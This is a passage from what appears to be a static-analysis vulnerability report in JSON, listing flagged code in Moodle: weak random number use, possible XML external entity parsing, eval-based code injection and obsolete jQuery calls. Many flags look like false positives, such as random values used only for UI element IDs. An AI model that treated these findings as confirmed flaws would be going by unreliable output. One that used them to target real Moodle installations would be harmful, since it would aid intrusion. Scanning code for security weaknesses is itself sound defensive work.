'qtype_ddimageortext-form-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.fp = this.file_pickers();\n var tn = Y.one(this.get('topnode'));\n tn.one('div.fcontainer').append('<div class=\"ddarea\"><div class=\"droparea\"></div><div class=\"dragitems\"></div>' +\n '<div class=\"dropzones\"></div></div>');\n", "vulnerId": "APPCUT:62:14585", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 66, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 31, "positionInEndLine": 68, "startLineNumber": 31, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddwtos/yui/build/moodle-qtype_ddwtos-dd/moodle-qtype_ddwtos-dd-debug.js", "code": " */\nY.extend(DDWTOS_DD, Y.Base, {\n selectors : null,\n touchscrolldisable: null,\n initializer : function() {\n var pendingid = 'qtype_ddwtos-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(pendingid);\n this.selectors = this.css_selectors(this.get('topnode'));\n this.set_padding_sizes_all();\n this.clone_drag_items();\n this.initial_place_of_drag_items();\n", "vulnerId": "APPCUT:62:14580", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 53, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 39, "positionInEndLine": 55, "startLineNumber": 39, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/editor/atto/plugins/image/yui/build/moodle-atto_image-button/moodle-atto_image-button-debug.js", "code": " formData.append('savepath', savepath);\n formData.append('ctx_id', options.context.id);\n\n // Insert spinner as a placeholder.\n timestamp = new Date().getTime();\n uploadid = 'moodleimage_' + Math.round(Math.random() * 100000) + '-' + timestamp;\n host.focus();\n host.restoreSelection();\n imagehtml = template({\n url: M.util.image_url(\"i/loading_small\", 'moodle'),\n alt: M.util.get_string('uploading', COMPONENTNAME),\n", "vulnerId": "APPCUT:62:14562", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 62, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 277, "positionInEndLine": 65, "startLineNumber": 277, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddimageortext/yui/build/moodle-qtype_ddimageortext-form/moodle-qtype_ddimageortext-form.js", "code": "Y.extend(DDIMAGEORTEXT_FORM, M.qtype_ddimageortext.dd_base_class, {\n pendingid: '',\n fp : null,\n\n initializer : function() {\n this.pendingid = 'qtype_ddimageortext-form-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.fp = this.file_pickers();\n var tn = Y.one(this.get('topnode'));\n tn.one('div.fcontainer').append('<div class=\"ddarea\"><div class=\"droparea\"></div><div class=\"dragitems\"></div>' +\n '<div class=\"dropzones\"></div></div>');\n", "vulnerId": "APPCUT:62:14574", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 66, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 31, "positionInEndLine": 68, "startLineNumber": 31, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddwtos/yui/build/moodle-qtype_ddwtos-dd/moodle-qtype_ddwtos-dd.js", "code": " */\nY.extend(DDWTOS_DD, Y.Base, {\n selectors : null,\n touchscrolldisable: null,\n initializer : function() {\n var pendingid = 'qtype_ddwtos-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(pendingid);\n this.selectors = this.css_selectors(this.get('topnode'));\n this.set_padding_sizes_all();\n this.clone_drag_items();\n this.initial_place_of_drag_items();\n", "vulnerId": "APPCUT:62:14581", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 53, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 39, "positionInEndLine": 55, "startLineNumber": 39, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/editor/atto/plugins/image/yui/build/moodle-atto_image-button/moodle-atto_image-button.js", "code": " formData.append('savepath', savepath);\n formData.append('ctx_id', options.context.id);\n\n // Insert spinner as a placeholder.\n timestamp = new Date().getTime();\n uploadid = 'moodleimage_' + Math.round(Math.random() * 100000) + '-' + timestamp;\n host.focus();\n host.restoreSelection();\n imagehtml = template({\n url: M.util.image_url(\"i/loading_small\", 'moodle'),\n alt: M.util.get_string('uploading', COMPONENTNAME),\n", "vulnerId": "APPCUT:62:14590", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 62, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 277, "positionInEndLine": 65, "startLineNumber": 277, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/mod/lesson/locallib.php", "code": " if (!array_key_exists($branchtable, $seen)) {\n $unseen[] = $branchtable;\n }\n }\n if (count($unseen) > 0) {\n return $unseen[rand(0, count($unseen)-1)]; // returns a random page id for the next page\n } else {\n return LESSON_EOL; // has viewed all of the branch tables\n }\n}\n\n", "vulnerId": "APPCUT:62:14557", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 23, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 220, "positionInEndLine": 48, "startLineNumber": 220, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/editor/atto/plugins/image/yui/src/button/js/button.js", "code": " formData.append('savepath', savepath);\n formData.append('ctx_id', options.context.id);\n\n // Insert spinner as a placeholder.\n timestamp = new Date().getTime();\n uploadid = 'moodleimage_' + Math.round(Math.random() * 100000) + '-' + timestamp;\n host.focus();\n host.restoreSelection();\n imagehtml = template({\n url: M.util.image_url(\"i/loading_small\", 'moodle'),\n alt: M.util.get_string('uploading', COMPONENTNAME),\n", "vulnerId": "APPCUT:62:14582", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 62, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 275, "positionInEndLine": 65, "startLineNumber": 275, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/editor/atto/yui/src/rangy/js/rangy-selectionsaverestore.js", "code": " function gEBI(id, doc) {\n return (doc || document).getElementById(id);\n }\n\n function insertRangeBoundaryMarker(range, atStart) {\n var markerId = \"selectionBoundary_\" + (+new Date()) + \"_\" + (\"\" + Math.random()).slice(2);\n var markerEl;\n var doc = dom.getDocument(range.startContainer);\n\n // Clone the Range and collapse to the appropriate boundary point\n var boundaryRange = range.cloneRange();\n", "vulnerId": "APPCUT:62:14578", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 89, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 30, "positionInEndLine": 91, "startLineNumber": 30, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/bennu/bennu.class.php", "code": " $clock_seq_hi_and_reserved = sprintf('%02x', (1 << 7) + mt_rand(0, 63)); // 10 plus 6 random bits\n\n // Need another 14 random octects\n $pool = '';\n for($i = 0; $i < 7; ++$i) {\n $pool .= sprintf('%04x', mt_rand(0, 65535));\n }\n\n // time_low = 4 octets\n $random = substr($pool, 0, 8).'-';\n\n", "vulnerId": "APPCUT:62:14552", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 37, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 40, "positionInEndLine": 54, "startLineNumber": 40, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddmarker/yui/build/moodle-qtype_ddmarker-form/moodle-qtype_ddmarker-form.js", "code": "};\nY.extend(DDMARKER_FORM, M.qtype_ddmarker.dd_base_class, {\n fp : null,\n\n initializer : function() {\n var pendingid = 'qtype_ddmarker-form-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(pendingid);\n this.fp = this.file_pickers();\n var tn = Y.one(this.get('topnode'));\n tn.one('div.fcontainer').append(\n '<div class=\"ddarea\">' +\n", "vulnerId": "APPCUT:62:14584", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 60, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 29, "positionInEndLine": 62, "startLineNumber": 29, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddimageortext/yui/build/moodle-qtype_ddimageortext-dd/moodle-qtype_ddimageortext-dd-debug.js", "code": " */\nY.extend(DDIMAGEORTEXT_QUESTION, M.qtype_ddimageortext.dd_base_class, {\n touchscrolldisable: null,\n pendingid: '',\n initializer : function() {\n this.pendingid = 'qtype_ddimageortext-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.doc = this.doc_structure(this);\n this.poll_for_image_load(null, false, 10, this.create_all_drag_and_drops);\n this.doc.bg_img().after('load', this.poll_for_image_load, this,\n false, 10, this.create_all_drag_and_drops);\n", "vulnerId": "APPCUT:62:14563", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 61, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 255, "positionInEndLine": 63, "startLineNumber": 255, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddwtos/yui/src/ddwtos/js/ddwtos.js", "code": " */\nY.extend(DDWTOS_DD, Y.Base, {\n selectors : null,\n touchscrolldisable: null,\n initializer : function() {\n var pendingid = 'qtype_ddwtos-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(pendingid);\n this.selectors = this.css_selectors(this.get('topnode'));\n this.set_padding_sizes_all();\n this.clone_drag_items();\n this.initial_place_of_drag_items();\n", "vulnerId": "APPCUT:62:14555", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 53, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 37, "positionInEndLine": 55, "startLineNumber": 37, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}]}, {"pageNumber": 16, "vulnerabilities": [{"sourceFileName": "moodle/lib/flickrlib.php", "code": " }\n\n $args['photo'] = $photo; // $this->curl will process it correctly\n\n if ($response = $this->curl->post($this->Upload, $args)) {\n $xml = simplexml_load_string($response);\n if ($xml['stat'] == 'fail') {\n $this->parsed_response = array('stat' => (string) $xml['stat'], 'code' => (int) $xml->err['code'],\n 'message' => (string) $xml->err['msg']);\n } elseif ($xml['stat'] == 'ok') {\n $this->parsed_response = array('stat' => (string) $xml['stat'], 'photoid' => (int) $xml->photoid);\n", "vulnerId": "APPCUT:62:14611", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 19, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 1149, "positionInEndLine": 51, "startLineNumber": 1149, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/flickrlib.php", "code": " if ($command != 'flickr.upload') {\n $ret = $this->curl->post($this->REST, $args);\n $this->parsed_response = $this->clean_text_nodes(unserialize($ret));\n } else {\n $args['photo'] = $photo;\n $xml = simplexml_load_string($this->curl->post($this->Upload, $args));\n\n if ($xml['stat'] == 'fail') {\n $this->parsed_response = array('stat' => (string) $xml['stat'], 'code' => (int) $xml->err['code'], 'message' => (string) $xml->err['msg']);\n } elseif ($xml['stat'] == 'ok') {\n $this->parsed_response = array('stat' => (string) $xml['stat'], 'photoid' => (int) $xml->photoid);\n", "vulnerId": "APPCUT:62:14610", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 19, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 139, "positionInEndLine": 81, "startLineNumber": 139, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/admin/thirdpartylibs.php", "code": "$table->id = 'thirdpartylibs';\n$table->attributes['class'] = 'admintable generaltable';\n$table->data = array();\n\nforeach ($files as $component => $xmlpath) {\n $xml = simplexml_load_file($xmlpath);\n foreach ($xml as $lib) {\n $base = realpath(dirname($xmlpath));\n $location = substr($base, strlen($CFG->dirroot)).'/'.$lib->location;\n if (is_dir($CFG->dirroot.$location)) {\n $location .= '/';\n", "vulnerId": "APPCUT:62:14607", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 11, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 54, "positionInEndLine": 40, "startLineNumber": 54, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/boxlib.php", "code": " $args = array();\n $xml = $c->get($this->_box_api_url, $params);\n } catch (Exception $e){\n }\n $ret = array();\n $o = simplexml_load_string(trim($xml));\n if($o->status == 'listing_ok') {\n $tree = $o->tree->folder;\n $this->buildtree($tree, $ret);\n }\n return $ret;\n", "vulnerId": "APPCUT:62:14603", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 13, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 427, "positionInEndLine": 46, "startLineNumber": 427, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/xhprof/xhprof_html/jquery/jquery.autocomplete.js", "code": "\t\t\t} else {\n\t\t\t\tmoveSelect(-8);\n\t\t\t}\n\t\t},\n\t\tpageDown: function() {\n\t\t\tif (active != listItems.size() - 1 && active + 8 > listItems.size()) {\n\t\t\t\tmoveSelect( listItems.size() - 1 - active );\n\t\t\t} else {\n\t\t\t\tmoveSelect(8);\n\t\t\t}\n\t\t},\n", "vulnerId": "APPCUT:62:14413", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/DeprecatedJQueryMethods.html", "positionInStartLine": 68, "patternDescription": "Using obsolete methods poorly affects code quality and security.", "appercutVulnerName": "Using Obsolete jQuery Methods", "endLineNumber": 682, "positionInEndLine": 70, "startLineNumber": 682, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/mod/lti/service.php", "code": " throw new Exception('Message signature not valid');\n}\n\n// TODO MDL-46023 Replace this code with a call to the new library.\n$origentity = libxml_disable_entity_loader(true);\n$xml = simplexml_load_string($rawbody);\nif (!$xml) {\n libxml_disable_entity_loader($origentity);\n throw new Exception('Invalid XML content');\n}\nlibxml_disable_entity_loader($origentity);\n", "vulnerId": "APPCUT:62:14606", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 7, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 71, "positionInEndLine": 38, "startLineNumber": 71, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/xhprof/xhprof_html/jquery/jquery.autocomplete.js", "code": "\t\t\t\tmoveSelect(-8);\n\t\t\t}\n\t\t},\n\t\tpageDown: function() {\n\t\t\tif (active != listItems.size() - 1 && active + 8 > listItems.size()) {\n\t\t\t\tmoveSelect( listItems.size() - 1 - active );\n\t\t\t} else {\n\t\t\t\tmoveSelect(8);\n\t\t\t}\n\t\t},\n\t\thide: function() {\n", "vulnerId": "APPCUT:62:14433", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/DeprecatedJQueryMethods.html", "positionInStartLine": 30, "patternDescription": "Using obsolete methods poorly affects code quality and security.", "appercutVulnerName": "Using Obsolete jQuery Methods", "endLineNumber": 683, "positionInEndLine": 33, "startLineNumber": 683, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/repository/s3/S3.php", "code": "\t{\n\t\t$rest->getResponse();\n\t\tif ($rest->response->error === false && isset($rest->response->body) &&\n\t\tis_string($rest->response->body) && substr($rest->response->body, 0, 5) == '<?xml')\n\t\t{\n\t\t\t$rest->response->body = simplexml_load_string($rest->response->body);\n\t\t\t// Grab CloudFront errors\n\t\t\tif (isset($rest->response->body->Error, $rest->response->body->Error->Code,\n\t\t\t$rest->response->body->Error->Message))\n\t\t\t{\n\t\t\t\t$rest->response->error = array(\n", "vulnerId": "APPCUT:62:14631", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 27, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 1796, "positionInEndLine": 71, "startLineNumber": 1796, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/backup/cc/cc_lib/cc_organization.php", "code": " $this->sequencing = null;\n\n }\n\n public function uuidgen() {\n $uuid = sprintf('%04x%04x', mt_rand(0, 65535), mt_rand(0, 65535));\n return strtoupper(trim($uuid));\n }\n\n\n}\n", "vulnerId": "APPCUT:62:14419", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 55, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 119, "positionInEndLine": 72, "startLineNumber": 119, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/xhprof/xhprof_html/jquery/jquery.autocomplete.js", "code": "\t};\n\t\n\tfunction movePosition(step) {\n\t\tactive += step;\n\t\tif (active < 0) {\n\t\t\tactive = listItems.size() - 1;\n\t\t} else if (active >= listItems.size()) {\n\t\t\tactive = 0;\n\t\t}\n\t}\n\t\n", "vulnerId": "APPCUT:62:14408", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/DeprecatedJQueryMethods.html", "positionInStartLine": 26, "patternDescription": "Using obsolete methods poorly affects code quality and security.", "appercutVulnerName": "Using Obsolete jQuery Methods", "endLineNumber": 627, "positionInEndLine": 29, "startLineNumber": 627, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/repository/merlot/lib.php", "code": " global $OUTPUT;\n $list = array();\n $this->api = 'https://www.merlot.org/merlot/materials.rest?keywords=' . urlencode($keyword) . '&licenseKey='.$this->licensekey;\n $c = new curl(array('cache'=>true, 'module_cache'=>'repository'));\n $content = $c->get($this->api);\n $xml = simplexml_load_string($content);\n foreach ($xml->results->material as $entry) {\n $list[] = array(\n 'title'=>(string)$entry->title,\n 'thumbnail'=>$OUTPUT->pix_url(file_extension_icon($entry->title, 90))->out(false),\n 'date'=>userdate((int)$entry->creationDate),\n", "vulnerId": "APPCUT:62:14619", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 15, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 91, "positionInEndLine": 46, "startLineNumber": 91, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/xhprof/xhprof_html/jquery/jquery.autocomplete.js", "code": "\t\n\tfunction movePosition(step) {\n\t\tactive += step;\n\t\tif (active < 0) {\n\t\t\tactive = listItems.size() - 1;\n\t\t} else if (active >= listItems.size()) {\n\t\t\tactive = 0;\n\t\t}\n\t}\n\t\n\tfunction limitNumberOfItems(available) {\n", "vulnerId": "APPCUT:62:14438", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/DeprecatedJQueryMethods.html", "positionInStartLine": 37, "patternDescription": "Using obsolete methods poorly affects code quality and security.", "appercutVulnerName": "Using Obsolete jQuery Methods", "endLineNumber": 628, "positionInEndLine": 39, "startLineNumber": 628, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/xhprof/xhprof_html/jquery/jquery.autocomplete.js", "code": "\t\t\t} else {\n\t\t\t\tmoveSelect(-8);\n\t\t\t}\n\t\t},\n\t\tpageDown: function() {\n\t\t\tif (active != listItems.size() - 1 && active + 8 > listItems.size()) {\n\t\t\t\tmoveSelect( listItems.size() - 1 - active );\n\t\t\t} else {\n\t\t\t\tmoveSelect(8);\n\t\t\t}\n\t\t},\n", "vulnerId": "APPCUT:62:14404", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/DeprecatedJQueryMethods.html", "positionInStartLine": 31, "patternDescription": "Using obsolete methods poorly affects code quality and security.", "appercutVulnerName": "Using Obsolete jQuery Methods", "endLineNumber": 682, "positionInEndLine": 34, "startLineNumber": 682, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/repository/s3/S3.php", "code": "\n\t\t// Parse body into XML\n\t\tif ($this->response->error === false && isset($this->response->headers['type']) &&\n\t\t$this->response->headers['type'] == 'application/xml' && isset($this->response->body))\n\t\t{\n\t\t\t$this->response->body = simplexml_load_string($this->response->body);\n\n\t\t\t// Grab S3 errors\n\t\t\tif (!in_array($this->response->code, array(200, 204, 206)) &&\n\t\t\tisset($this->response->body->Code, $this->response->body->Message))\n\t\t\t{\n", "vulnerId": "APPCUT:62:14602", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 27, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 2255, "positionInEndLine": 71, "startLineNumber": 2255, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/horde/framework/Horde/Support/Uuid.php", "code": " }\n if (!$this->_uuid) {\n list($time_mid, $time_low) = explode(' ', microtime());\n $time_low = (int)$time_low;\n $time_mid = (int)substr($time_mid, 2) & 0xffff;\n $time_high = mt_rand(0, 0x0fff) | 0x4000;\n\n $clock = mt_rand(0, 0x3fff) | 0x8000;\n\n $node_low = function_exists('zend_thread_id')\n ? zend_thread_id()\n", "vulnerId": "APPCUT:62:14442", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 25, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 58, "positionInEndLine": 44, "startLineNumber": 58, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}]}, {"pageNumber": 5, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n errorCode = \"201\";\n }\n", "vulnerId": "APPCUT:62:14293", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 73, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 307, "positionInEndLine": 118, "startLineNumber": 307, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if (errorCode == \"0\") {\n // Till now it's a real datamodel element\n\n element = subelement.concat('.' + elementIndexes[elementIndexes.length - 1]);\n\n if ((typeof eval(subelement)) == \"undefined\") {\n switch (elementmodel) {\n case 'cmi.objectives.n.id':\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n", "vulnerId": "APPCUT:62:14305", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 52, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 527, "positionInEndLine": 64, "startLineNumber": 527, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/3.17.2/json-parse-shim/json-parse-shim.js", "code": " replace(_VALUES,']').\n replace(_BRACKETS,''))) {\n\n // Eval the text into a JavaScript data structure, apply any\n // reviver function, and return\n return _revive(eval('(' + s + ')'), reviver);\n }\n\n throw new SyntaxError('JSON.parse');\n};\n\n", "vulnerId": "APPCUT:62:14306", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 27, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", 